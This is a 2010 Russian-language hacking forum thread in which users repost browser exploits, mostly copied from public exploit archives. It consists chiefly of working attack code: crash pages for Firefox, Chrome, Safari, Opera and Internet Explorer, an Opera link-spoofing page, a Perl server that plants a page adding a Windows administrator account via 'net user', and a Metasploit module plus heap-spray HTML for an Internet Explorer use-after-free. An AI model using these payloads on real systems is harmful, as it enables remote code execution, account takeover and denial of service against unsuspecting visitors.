Уязвимости браузеров

Discussion in 'Песочница' started by 547, 23 Mar 2010.

  1. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    Firefox 3.5 unicode stack overflow. Andrew Haynes , Simon Berry-Byrne




    Code:
    <html>
<head>
<script language="JavaScript" type="Text/Javascript">
	var str = unescape("%u4141䅁");
	var str2 = unescape("");
	var finalstr2 = mul8(str2, 49000000);
	var finalstr = mul8(str,   21000000);


document.write(finalstr2); 
document.write(finalstr); 

function mul8 (str, num) {
	var	i = Math.ceil(Math.log(num) / Math.LN2),
		res = str;
	do {
		res += res;
	} while (0 < --i);
	return res.slice(0, str.length * num);
}
</script>
</head>
<body>
</body>
</html>
<html><body></body></html>

# milw0rm.com [2009-07-15]
    Добавлено через 12 минут
    Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service Exploit
    Code:
    # EDB-ID: 11432
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Asheesh kumar Mani Tripathi
# Published: 2010-02-13
# Verified: yes
# Download Exploit Code
# Download N/A

view source
print?
                     =======================================================================
 
                      Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service Exploit
                     =======================================================================
 
                                                     by
 
                                            Asheesh Kumar Mani Tripathi
 
 
# code by Asheesh kumar Mani Tripathi
 
# email [email][email protected][/email]
 
# company       aksitservices
 
# Credit by Asheesh Anaconda
 
 
#Download [url]www.mozilla.com/firefox[/url]
 
 
#Background
 
Mozilla Firefox is a popular internet browser. .....:)
 
#Vulnerability
This bug is a typical result of multitudinous  loop. 
The flaw exists when the attacker put window.printer() funtion
in multitudinous loop.User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.
 
 
#Impact
Browser doesn't respond any longer to any user input, all tabs are no
longer accessible, your work if any   might be lost.
 
 
 
#Proof of concept
copy the code in text file and save as "asheesh.html" open in Mozilla Firefox
 
========================================================================================================================
 
                                                           asheesh.html
========================================================================================================================
 
<html>
<title>asheesh kumar mani tripathi</title>
 
<script>
 
 
function
asheesh()
{
window.onerror=new Function("history.go(0)");
window.print();
asheesh();
 
 
}
asheesh();
</script>
 
</html>
                                                            
========================================================================================================================
 
 
#If you have any questions, comments, or concerns, feel free to contact me.
    Добавлено через 42 минуты
    Mozilla Firefox <= 3.6 Denial Of Service Exploit
    Code:
    # EDB-ID: 11590
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Ale46
# Published: 2010-02-27
# Verified: yes
# Download Exploit Code
# Download Vulnerable app

view source
print?
<?php
 
/*
*    Title: Mozilla Firefox <=3.6 - Remote Denial Of Service Exploit
*    Date: 25/02/10
*    Author: Ale46 - ale46[at]paranoici[dot]org
*    Software Link: [url]http://www.mozilla-europe.org/en/firefox/[/url]
*    Version: 3.6 and 3.5.8 are vulnerable so I think that all versions <= 3.6 have the same issue
*    Tested on: Windows 7 x32\x64 - Ubuntu 9.10 x32
*    Description: visiting this php page you'll get an instant crash of Firefox
*    Greetz: Gandalf
*    Extra Greetz: University of Palermo and its fantastics rules for the Computer Engineering degree (how beautiful 's irony)
*/
 
$a = '<marquee>';
$b = '</marquee>';
 
for ($i=0;$i<=1000;$i++){
    $a .= '<marquee>';
    $b .= '</marquee>';
}
 
echo '<body>';
echo $a;
echo "hadouken!";
echo $b;
echo '</body>';
 
?>
    Opera 10.10 Status Bar Obfuscation
    Code:
    <center><h1>Opera 10.10 Status Bar Obfuscation</h1>
<br>
<strong>Author : 599eme Man.<br >
Contact : [email protected]</strong><br >
_______________________________________________________________________
<br>
<br>
<br>
 
Click on google (look the Status bar) and you'll be redirect on Yahoo<br><strong><h1><a onclick="javascript:OB();" href="http://www.Google.com">http://www.Google.com</a></h1></strong></center>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
                           <font style="font-family:arial;font-size:32px">Look Here<br>
                   | <br>
                  V
 
<script>
 
function OB() {
 
document.write('');
document.location='http://yahoo.com';
 
}
 
</script>
     
    #1 547, 23 Mar 2010
    Last edited: 23 Mar 2010
    1 person likes this.
  2. lzr

    lzr Member

    Joined:
    1 Jan 2009
    Messages:
    26
    Likes Received:
    12
    Reputations:
    3
    Cross Site URL Hijacking by using Error Object in Mozilla Firefox

    XSUH атаки используется, чтобы украсть URL другого веб-сайта. Этот URL может показать статус клиента на этом сайте, и он может содержать конфиденциальную информацию, такую как идентификатор сессии и т.п.

    Как вы знаете, сценарии обработки ошибок в Mozilla Firefox являются весьма полезными для разработчиков, они могут показать точный источник ошибки и другую полезную информацию. Теперь эта функция может быть использована для кражи URL после редиректа (XSUH атака), что может привести к утечке конфиденциальной информации.

    Сама техника проведения атаки здесь [eng]

    Примерчик

    Было протестированно на Mozilla Firefox 3.6.3, 3.5.9, 3.6.4 build 5 (26.05.2010).

    ===================================
    All browsers 0day Crash Exploit (2)
    ===================================

    Code:
    <html>
<head>
<meta http-equiv="Refresh" content="999999999999999999999999999999999999">
<title>Crasher</title></head>
<html>
<body bgcolor="black">
<center>
<font color="red">
<br>
<br>
<br>
<br>
<script language="javascript">
now=new Date();
document.write(now+"<br>");
h=now.getHours();
m=now.getMinutes();
s=now.getSeconds();
document.write("<font size='+5'>");
for (i =0;i<99999999999999999;i++) {
document.write('<html><marquee><h1>'+h+":"+m+":"+s);
}
alert('aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa')
</script>
</center>
</font>
</body>
</html>
     
    #2 lzr, 28 May 2010
    Last edited: 28 May 2010
    1 person likes this.
  3. lzr

    lzr Member

    Joined:
    1 Jan 2009
    Messages:
    26
    Likes Received:
    12
    Reputations:
    3
    ================================================== ====================
    Google Chrome 4.1.249.1064 Remote Memory Corrupt (Local Crash Exploit)
    ================================================== ====================

    Save this script with extension .html or .htm
    Then open with Google Chrome web browser

    THIS FOR EDUCATIONAL PURPOSE ONLY
    AUTHOR WILL NOT RESPONSIBLE FOR ANY DAMAGE

    Webpage display issues: "Aw, Snap!"
    Issue: You may see the "Aw, Snap!" message if a webpage crashes unexpectedly.

    Tested on: WINXP (sp2 - sp3) - WIN 7
    Affected: Google Chrome version 4.1.249.1064 and Prior

    Author: eidelweiss
    Contact: eidelweiss[at]cyberservices[dot]com OR g1xsystem[at]windowslive.com
    Greets: [D]eal [c]yber and All Indonesian Hacker`s


    Код:
    Code:
    <body onload="javascript:DoS();"></body>
 
<script>
 
function DoS() {
 
var buffer = '\x41';
for (i =0;i<666;i++) {
buffer+=buffer+'\x41';
document.write('<html><marquee><h1>'+buffer+buffer);
}
 
}
 
</script>
    ================================================== =
    Google Chrome acronym tag denial of service exploit
    ================================================== =

    Код:
    Code:
    <html>
<title>Google Chrome remote stack overflow in chrome.dll; published at http://h.ackack.net; found by: Jelmer de Hen</title>
<head>
<script>
// Open it a couple of times, it might not always work; see http://h.ackack.net/?p=323 for more information
function pataboom(){
	while(1){
		document.write("<acronym>");
	}
}
</script>
</head>
<body onload="pataboom();"></body>
</html>
    ================================================== ============
    Safari 4.0.5 and Internet Explorer 6.0 / 8.0 Denial of Service
    ================================================== ============

    Код:
    Code:
    <?php
# Canvas tag DoS Mozilla firefox 3.6.3
# Canvas tag DoS Safari 4.0.5 (TESTED)
# Canvas tag DoS Google Chrome 4.1
# Canvas tag DoS Opera 10.52
# Canvas tag DoS Internet Explorer 6.0 & 8.0 (TESTED)
#
# Found by Jelmer de Hen
# published at http://h.ackack.net/?p=269
# OS: Windows XP SP3
# Mozilla Firefox 3.6.3

echo "<html><body>";
while (1){
	echo "<canvas>";
}
echo "</body>";
echo "</html>";
?>
    Multiple Browsers Audio Tag Denial of Service Vulnerability
    Код:
    Code:
    #!/usr/bin/python

#Multiple Browsers Audio Tag Denial of Service Vulnerability
#any ogg file can be used for the DoS as long as it is a valid file on the server
#crash reporter for Mac seems to think this is a EXEC_BAD_ACCESS
#This script acts as a web server to DoS connecting clients

# Exploit Title: Multiple Browsers Audio Tag DoS Vulnerability
# Date: April 21th, 2010
# Author: Chase Higgins, http://twitter.com/tzDev
# Software Link: google.com/chrome, apple.com/safari
# Version: Google Chrome 5.0.375.9 dev
# Tested on: Mac OSX 10.5.8
 
import sys, socket;

def main():
	html = """
	<html>
	<body>
	""";
	
	html += "<audio src='myogg.ogg'>" * 10000;
	
	html += """
	</body>
	</html>
	""";
	
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
	s.bind(('', 2121));
	s.listen(1);
	
	while True:
		channel, details = s.accept();
		print channel.recv(256);
		channel.send(html);
		channel.close();
	
main();
     
    #3 lzr, 29 May 2010
  4. lzr

    lzr Member

    Joined:
    1 Jan 2009
    Messages:
    26
    Likes Received:
    12
    Reputations:
    3
    Internet Explorer ( 6/7) Remote Code Execution -Remote User Add Exploit

    Code:
    #!/usr/bin/perl 
   
use strict; 
use Socket; 
use IO::Socket; 
print "\n"; 
print "800008                           8                      \n"; 
print "8      e  eeeee eeeeeee eeeee    8     eeeee eeeee  eeeee\n"; 
print "8eeeee 8  8  88 8  8  8 8   8    8e    8   8 8   8  8   | \n"; 
print "    88 8e 8   8 8e 8  8 8eee8    88    8eee8 8eee8e 8eeee \n"; 
print "e   88 88 8   8 88 8  8 88  8    88    88  8 88   8    88 \n"; 
print "8eee88 88 8eee8 88 8  8 88  8    88eee 88  8 88eee8 8ee88 \n"; 
print "-----------------------------------------------------------\n"; 
print " Useage : $0 Port \n"; 
print " Please Read the Instruction befor you use this \n"; 
print " ---------------------------------\n"; 
   
sub parse_form { 
    my $data = $_[0]; 
    my %data; 
    foreach (split /&/, $data) { 
        my ($key, $val) = split /=/; 
        $val =~ s/\+/ /g; 
        $val =~ s/%(..)/chr(hex($1))/eg; 
        $data{$key} = $val;} 
    return %data; } 
   
my $port = shift; 
defined($port) or die "Usage: $0 Port \n"; 
mkdir("public_html", 0777) || print $!; 
my $DOCUMENT_ROOT = $ENV{'HOME'} . "/public_html"; 
   
print " [+] Account Name : "; chomp(my $acc=<STDIN>); 
print " [+] Account Password : "; chomp(my $pass=<STDIN>); 
print " [+] Your IP : "; chomp (my $ip=<STDIN>); 
#------------- Exploit ----------------- 
my $iexplt= "public_html/index.html"; 
 open (myfile, ">>$iexplt"); 
    print myfile "<html>\n"; 
    print myfile "<title> IE User Add Test </title>\n"; 
    print myfile "<head>"; 
    print myfile "</font></b></p>\n"; 
    print myfile "<p>\n"; 
    print myfile "<object classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8' id='exploit'\n"; 
    print myfile  "></object>\n"; 
    print myfile  "<script language='vbscript'>\n"; 
    print myfile  "adduser="; 
    print myfile '"cmd'; 
    print myfile " /c net user $acc $pass /add && net localgroup Administrators $acc "; 
    print myfile '/add"'; 
    print myfile "\n"; 
    print myfile "exploit.run adduser \n"; 
    print myfile "\n </script></p>\n"; 
    print " [+] ----------------------------------------\n"; 
    print " [-] Link Genetrated : http://$ip:$port/index.html\n"; 
        close (myfile); 
#------------------------------------ 
   
my $server = new IO::Socket::INET(Proto => 'tcp', 
                                  LocalPort => $port, 
                                  Listen => SOMAXCONN, 
                                  Reuse => 1); 
$server or die "Unable to create server socket: $!" ; 
   
while (my $client = $server->accept()) { 
    $client->autoflush(1); 
    my %request = (); 
    my %data; 
   
    { 
   
        local $/ = Socket::CRLF; 
        while (<$client>) { 
            chomp; 
            if (/\s*(\w+)\s*([^\s]+)\s*HTTP\/(\d.\d)/) { 
                $request{METHOD} = uc $1; 
                $request{URL} = $2; 
                $request{HTTP_VERSION} = $3; 
            } 
            elsif (/:/) { 
                (my $type, my $val) = split /:/, $_, 2; 
                $type =~ s/^\s+//; 
                foreach ($type, $val) { 
                         s/^\s+//; 
                         s/\s+$//; 
                } 
                $request{lc $type} = $val; 
            } 
            elsif (/^$/) { 
                read($client, $request{CONTENT}, $request{'content-length'}) 
                    if defined $request{'content-length'}; 
                last; 
            } 
        } 
    } 
   
   
    if ($request{METHOD} eq 'GET') { 
        if ($request{URL} =~ /(.*)\?(.*)/) { 
                $request{URL} = $1; 
                $request{CONTENT} = $2; 
                %data = parse_form($request{CONTENT}); 
        } else { 
                %data = (); 
        } 
        $data{"_method"} = "GET"; 
    } elsif ($request{METHOD} eq 'POST') { 
                %data = parse_form($request{CONTENT}); 
                $data{"_method"} = "POST"; 
    } else { 
        $data{"_method"} = "ERROR"; 
    } 
   
   
        my $localfile = $DOCUMENT_ROOT.$request{URL}; 
   
   
        if (open(FILE, "<$localfile")) { 
            print $client "HTTP/1.0 200 OK", Socket::CRLF; 
            print $client "Content-type: text/html", Socket::CRLF; 
            print $client Socket::CRLF; 
            my $buffer; 
            while (read(FILE, $buffer, 4096)) { 
                print $client $buffer; 
            } 
            $data{"_status"} = "200"; 
        } 
        else { 
            print $client "HTTP/1.0 404 Not Found", Socket::CRLF; 
            print $client Socket::CRLF; 
            print $client "<html><body>404 Not Found</body></html>"; 
            $data{"_status"} = "404"; 
        } 
        close(FILE); 
   
   
        print ($DOCUMENT_ROOT.$request{URL},"\n"); 
        foreach (keys(%data)) { 
                print ("   $_ = $data{$_}\n"); } 
   
   
    close $client; 
    # Sioma Labs 
    # http://siomalabs.com 
    # Sioma Agent 154 
}
    0-day експлойт для Internet Explorer

    описание : http://garwarner.blogspot.com/2010/03/microsoft-releases-out-of-band-ie.html

    експлоиты :

    1
    Code:
    ##
2    # $Id: ie_iepeers_pointer.rb 8779 2010-03-11 05:49:14Z hdm $
3    ##
4    
5    ##
6    # This file is part of the Metasploit Framework and may be subject to
7    # redistribution and commercial restrictions. Please see the Metasploit
8    # Framework web site for more information on licensing and terms of use.
9    # http://metasploit.com/framework/
10    ##
11    
12    ##
13    # ie_iepeers_pointer.rb
14    #
15    # Microsoft Internet Explorer iepeers.dll use-after-free exploit for the Metasploit Framework
16    #
17    # Tested successfully on the following platforms:
18    #  - Microsoft Internet Explorer 7, Windows Vista SP2
19    #  - Microsoft Internet Explorer 7, Windows XP SP3
20    #  - Microsoft Internet Explorer 6, Windows XP SP3
21    #
22    # Exploit found in-the-wild. For additional details:
23    # http://www.rec-sec.com/2010/03/10/internet-explorer-iepeers-use-after-free-exploit/
24    #
25    # Trancer
26    # http://www.rec-sec.com
27    ##
28    
29    require 'msf/core'
30    
31    class Metasploit3 < Msf::Exploit::Remote
32            Rank = GoodRanking
33    
34            include Msf::Exploit::Remote::HttpServer::HTML
35    
36            def initialize(info = {})
37                    super(update_info(info,
38                            'Name'           => 'Internet Explorer iepeers.dll Use After Free',
39                            'Description'    => %q{
40                                            This module exploits a use-after-free vulnerability within iepeers.dll of
41                                    Microsoft Internet Explorer versions 6 and 7.
42    
43                                    NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.
44                            },
45                            'License'        => MSF_LICENSE,
46                            'Author'         =>
47                                    [
48                                            'unknown',                         # original discovery
49                                            'Trancer <mtrancer[at]gmail.com>', # metasploit module
50                                            'jduck'                            # minor cleanups
51                                    ],
52                            'Version'        => '$Revision: 8779 $',
53                            'References'     =>
54                                    [
55                                            [ 'CVE', '2010-0806' ],
56                                            [ 'OSVDB', '62810' ],
57                                            [ 'BID', '38615' ],
58                                            [ 'URL', 'http://www.microsoft.com/technet/security/advisory/981374.mspx' ],
59                                            [ 'URL', 'http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/' ]
60                                    ],
61                            'DefaultOptions' =>
62                                    {
63                                            'EXITFUNC' => 'process',
64                                            'InitialAutoRunScript' => 'migrate -f',
65                                    },
66                            'Payload'        =>
67                                    {
68                                            'Space'         => 1024,
69                                            'BadChars'      => "\x00\x09\x0a\x0d'\\",
70                                            'StackAdjustment' => -3500,
71                                    },
72                            'Platform'       => 'win',
73                            'Targets'        =>
74                                    [
75                                            [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ]
76                                    ],
77                            'DisclosureDate' => 'Mar 09 2010',
78                            'DefaultTarget'  => 0))
79            end
80    
81            def on_request_uri(cli, request)
82    
83                    # Re-generate the payload
84                    return if ((p = regenerate_payload(cli)) == nil)
85    
86                    # Encode the shellcode
87                    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
88    
89                    # Set the return\nops
90                    ret            = Rex::Text.to_unescape([target.ret].pack('V'))
91    
92                    # Randomize the javascript variable names
93                    j_shellcode         = rand_text_alpha(rand(100) + 1)
94                    j_nops                 = rand_text_alpha(rand(100) + 1)
95                    j_slackspace = rand_text_alpha(rand(100) + 1)
96                    j_fillblock         = rand_text_alpha(rand(100) + 1)
97                    j_memory         = rand_text_alpha(rand(100) + 1)
98                    j_counter         = rand_text_alpha(rand(30) + 2)
99                    j_ret                 = rand_text_alpha(rand(100) + 1)
100                    j_array                 = rand_text_alpha(rand(100) + 1)
101                    j_function1         = rand_text_alpha(rand(100) + 1)
102                    j_function2         = rand_text_alpha(rand(100) + 1)
103                    j_object         = rand_text_alpha(rand(100) + 1)
104                    j_id                 = rand_text_alpha(rand(100) + 1)
105    
106                    # Build out the message
107                    html = %Q|<html><body>
108    <button id='#{j_id}' onclick='#{j_function2}();' style='display:none'></button>
109    <script language='javascript'>
110    function #{j_function1}(){
111     var #{j_shellcode} = unescape('#{shellcode}');
112     #{j_memory} = new Array();
113     var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);
114     var #{j_nops} = unescape('#{ret}');
115     while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }
116     var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);
117     delete #{j_nops};
118     for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {
119      #{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};
120     }
121    }
122    function #{j_function2}(){
123     #{j_function1}();
124     var #{j_object} = document.createElement('body');
125     #{j_object}.addBehavior('#default#userData');
126     document.appendChild(#{j_object});
127     try {
128      for (#{j_counter}=0; #{j_counter}<10; #{j_counter}++) {
129            #{j_object}.setAttribute('s',window);
130      }
131     } catch(e){ }
132     window.status+='';
133    }
134    
135    document.getElementById('#{j_id}').onclick();
136    </script></body></html>
137    |
138    
139                    print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
140    
141                    # Transmit the compressed response to the client
142                    send_response(cli, html, { 'Content-Type' => 'text/html' })
143    
144                    # Handle the payload
145                    handler(cli)
146    
147            end
148    
149    end
    2
    Code:
    <html>
02    <body>
03    <button id="helloworld" onclick="blkjbdkjb();" STYLE="DISPLAY:NONE"></button>
04    <script language="JavaScript" src="bypasskav.txt">
05    </script>
06    <script language="JavaScript">
07    function eejeefe() {
08    var s=unescape("%u0c0c");
09    var u=unescape("%u0c0c");
10    var c=s+u;var array = new Array();
11    var ls = 0x86000-(c.length*2);
12    var b = unescape("%u0c0c%u0c0C");
13    while(b.length<ls/2){b+=b;
14    }
15    var lh = b.substring(0,ls/2);
16    delete b;for(i=0;i<270;i++) {
17    array[i] = lh + lh + c;
18    }
19    }
20    function blkjbdkjb() {
21    eejeefe();
22    var sdfsfsdf = document.createElement("BODY");
23    sdfsfsdf.addBehavior("#default#userData");
24    document.appendChild(sdfsfsdf);
25    try    {
26    for (i=0;i<10;i++)      {
27    sdfsfsdf.setAttribute('s',window);
28    }
29    }
30    catch(e)   {}
31    window.status+='';
32    }
33    document.getElementById("helloworld").onclick();
34    </script>
35    </body>
36    </html>
    3
    Code:
    # Title: Microsoft Internet Explorer iepeers.dll Use-After-Free Exploit (meta) 
  # EDB-ID: 11683 
# CVE-ID: () 
# OSVDB-ID: () 
# Author: Trancer  
# Published: 2010-03-10 
# Verified: yes 
# Download [URL="http://www.exploit-db.com/download/11683"]Exploit Code[/URL]
# Download N/A
 
 [URL="http://www.exploit-db.com/exploits/11683#viewSource"]view source[/URL]
[URL="http://www.exploit-db.com/exploits/11683#printSource"]print[/URL][URL="http://www.exploit-db.com/exploits/11683#about"]?[/URL]

##
# ie_iepeers_pointer.rb
#
# Microsoft Internet Explorer iepeers.dll use-after-free exploit for the Metasploit Framework
#
# Tested successfully on the following platforms:
#  - Microsoft Internet Explorer 7, Windows Vista SP2
#  - Microsoft Internet Explorer 7, Windows XP SP3
#  - Microsoft Internet Explorer 6, Windows XP SP3
#
# Exploit found in-the-wild. For additional details:
# [URL]http://www.rec-sec.com/2010/03/10/internet-explorer-iepeers-use-after-free-exploit/[/URL]
#
# Trancer
# [URL]http://www.rec-sec.com[/URL]
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = GoodRanking
 
    include Msf::Exploit::Remote::HttpServer::HTML
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Microsoft Internet Explorer iepeers.dll use-after-free',
            'Description'    => %q{
                This module exploits a use-after-free vulnerability within iepeers.dll of 
                Microsoft Internet Explorer versions 6 and 7.
                 
                NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.
            },
            'License'        => MSF_LICENSE,
            'Author'         => [ 
                        'Trancer <mtrancer[at]gmail.com>'
                        ], 
            'Version'        => '$Revision:$',
            'References'     =>
                [
                    [ 'CVE', '2010-0806' ],
                    [ 'OSVDB', '62810' ],
                    [ 'BID', '38615' ],
                    [ 'URL', 'http://www.microsoft.com/technet/security/advisory/981374.mspx' ],
                    [ 'URL', 'http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/' ]
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                    'InitialAutoRunScript' => 'migrate -f',
                },
            'Payload'        =>
                {
                    'Space'         => 1024,
                    'BadChars'      => "\x00\x09\x0a\x0d'\\",    
                    'StackAdjustment' => -3500,
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ]    
                ],
            'DisclosureDate' => 'Mar 09 2010',
            'DefaultTarget'  => 0))
    end
 
    def on_request_uri(cli, request)
         
        # Re-generate the payload
        return if ((p = regenerate_payload(cli)) == nil)
 
        # Encode the shellcode
        shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
 
        # Set the return\nops
        ret       = Rex::Text.to_unescape([target.ret].pack('V'))
 
        # Randomize the javascript variable names
        j_shellcode  = rand_text_alpha(rand(100) + 1)
        j_nops       = rand_text_alpha(rand(100) + 1)
        j_slackspace = rand_text_alpha(rand(100) + 1)
        j_fillblock  = rand_text_alpha(rand(100) + 1)
        j_memory     = rand_text_alpha(rand(100) + 1)
        j_counter    = rand_text_alpha(rand(30) + 2)
        j_ret        = rand_text_alpha(rand(100) + 1)
        j_array      = rand_text_alpha(rand(100) + 1)
        j_function1  = rand_text_alpha(rand(100) + 1)
        j_function2  = rand_text_alpha(rand(100) + 1)
        j_object     = rand_text_alpha(rand(100) + 1)
        j_id         = rand_text_alpha(rand(100) + 1)
 
        # Build out the message
        html = %Q|<html><body>
<button id='#{j_id}' onclick='#{j_function2}();' style='display:none'></button>
<script language='javascript'>
function #{j_function1}(){
    var #{j_shellcode} = unescape('#{shellcode}');
    #{j_memory} = new Array(); 
    var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2); 
    var #{j_nops} = unescape('#{ret}'); 
    while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; } 
    var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2); 
    delete #{j_nops}; 
    for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) { 
        #{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode}; 
    }
}
function #{j_function2}(){
    #{j_function1}();    
    var #{j_object} = document.createElement('body');
    #{j_object}.addBehavior('#default#userData');
    document.appendChild(#{j_object});
    try {
        for (#{j_counter}=0; #{j_counter}<10; #{j_counter}++) { 
            #{j_object}.setAttribute('s',window);
        }
    } catch(e){ }    
    window.status+='';
}
 
document.getElementById('#{j_id}').onclick();
</script></body></html>|
 
        print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
 
        # Transmit the compressed response to the client
        send_response(cli, html, { 'Content-Type' => 'text/html' })
         
        # Handle the payload
        handler(cli)
 
    end
 
end
     
    #4 lzr, 30 May 2010
    1 person likes this.
(You must log in or sign up to post here.)
Loading...
Similar Threads - Уязвимости браузеров
  1. zase

    массовый взлом сайтов

    zase, 25 Dec 2022, in forum: Песочница
    Replies:
    1
    Views:
    3,724
    lifescore
    14 Jan 2023
  2. Shadows_God

    Взлом сайтов

    Shadows_God, 20 Nov 2022, in forum: Песочница
    Replies:
    14
    Views:
    8,695
    CyberTro1n
    4 May 2024
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.